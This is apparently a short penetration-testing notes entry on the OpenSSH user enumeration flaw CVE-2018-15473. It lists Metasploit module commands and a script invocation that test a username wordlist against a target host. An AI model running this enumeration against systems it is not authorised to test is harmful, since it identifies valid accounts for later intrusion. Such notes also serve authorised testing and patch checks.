Users Enumeration

OpenSSH through 7.7 is prone to a user enumeration vulnerability (CVE-2018-15473).

Metasploit

use auxiliary/scanner/ssh/ssh_enumusers
set action Malformed Packet

ssh_enumusers.py

python2 ssh_enumusers.py --userList <USER WORDLSIT> --outputFile <OUTPUT RESULT> <HOST>

Source: ssh_enumusers.py

References